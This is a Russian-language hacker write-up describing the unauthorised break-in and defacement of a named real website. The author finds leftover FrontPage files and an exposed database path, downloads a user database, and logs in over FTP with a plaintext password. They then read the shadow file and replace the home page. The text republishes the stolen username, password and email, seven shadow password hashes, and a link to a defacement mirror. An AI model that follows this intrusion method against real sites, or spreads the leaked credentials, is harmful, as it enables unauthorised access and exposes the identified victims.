Deface в три хода

На днях разбираясь с новой уязвимостью, обнаруженной в a.shopKart, я наткнулся
на сайт www.surving.com.
Меня он сразу не заинтересовал, так как стоял на Apache/1.3.29 под *nix и к
самой уязвимости a.shopKart не мог иметь отношения,
хотя в директории /fpdb/ и лежала пустая база scart.mdb.
Пробежавжись взглядом по доступной для просмотра директории /fpdb/ я понял, что админ перенеc сайт с
M$ на *nix довольно криво, в директории лежали файлы с
.asp расширениями. Решив не отвлекаться от поставленной задачи, я просто загрузил url сайта в DCS и
стал дальше искать в поисковике магазины с a.shopKart. 

Ход 1. Е2 - Е4. 

Где-то через полчаса я посмотрел результаты сканирования и еще раз убедился, что
сайт был сваян на FrontPage для ISS, об этом говорила целая куча фронтпаговских файлов непонятно для
чего оставленных админом: 

www.surving.com/_private/form_results.txt 
www.surving.com/_vti_bin/_vti_aut/author.exe 
www.surving.com/_vti_bin/fpcount.exe 
www.surving.com/_vti_bin/shtml.dll 
www.surving.com/_vti_bin/shtml.exe 
www.surving.com/_vti_cnf/ 
www.surving.com/_vti_pvt/access.cnf 
www.surving.com/_vti_pvt/botinfs.cnf 
www.surving.com/_vti_pvt/bots.cnf 
www.surving.com/_vti_pvt/doctodep.btr 
www.surving.com/_vti_pvt/linkinfo.cnf 
www.surving.com/_vti_pvt/service.cnf 
www.surving.com/_vti_pvt/services.cnf 
www.surving.com/_vti_pvt/structure.cnf 
www.surving.com/_vti_pvt/svcacl.cnf 
www.surving.com/_vti_pvt/writeto.cnf 

Мое внимание сразу привлек другой файл: 

http://www.surving.com/admin/CONNECT.INC 

Открыв его я увидел: 

% 
Function Connect () 
Set DB = Server.CreateObject("ADODB.Connection") 
ConnStr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" + 
Server.MapPath("..\database\Users.mdb") 
DB.Open (ConnStr) 
Set Connect = DB 
End Function 
% 

Ход 2. Е4 - Е5. 

Увидев в файле CONNECT.INC строку \database\Users.mdb я решил проверить наличие этой базы.
Она оказалась на месте:
http://www.surving.com/database/Users.mdb и браузер предложил ее загрузить.
В базе оказалась только одна таблица Login с единственной записью: 

Username Password FirstName LastName Email 
surving iguana Surving Studios Rachel surving@warwick.net 

Ход 3. Шах! и Мат! 

Не особо надеясь на удачу я попытался зайти по ftp используя этот логин/пароль.
Меня пустили! Когда я стал оглядываться,  то понял, что похоже даже под root'om, файл shadow был открыт для чтения: 

richard:ltzn5V4JhD8pk::::::: 
sales:PV9h7/myEtzqM::::::: 
admin:ZTVcKxDV/N1Tg::::::: 
info:9fqrLq7CFPDLY::::::: 
forward:aydjIfX8.rKv2::::::: 
webmaster:jluzsHKAEKniI::::::: 
natalie:kjjb5BJl1nMqA::::::: 

Понятно, что с такими привилегиями заменить index.html уже ничего не стоило.

Зеркало:

http://taxidermia.void.ru/mirrors/2004/03/30/www.surving.com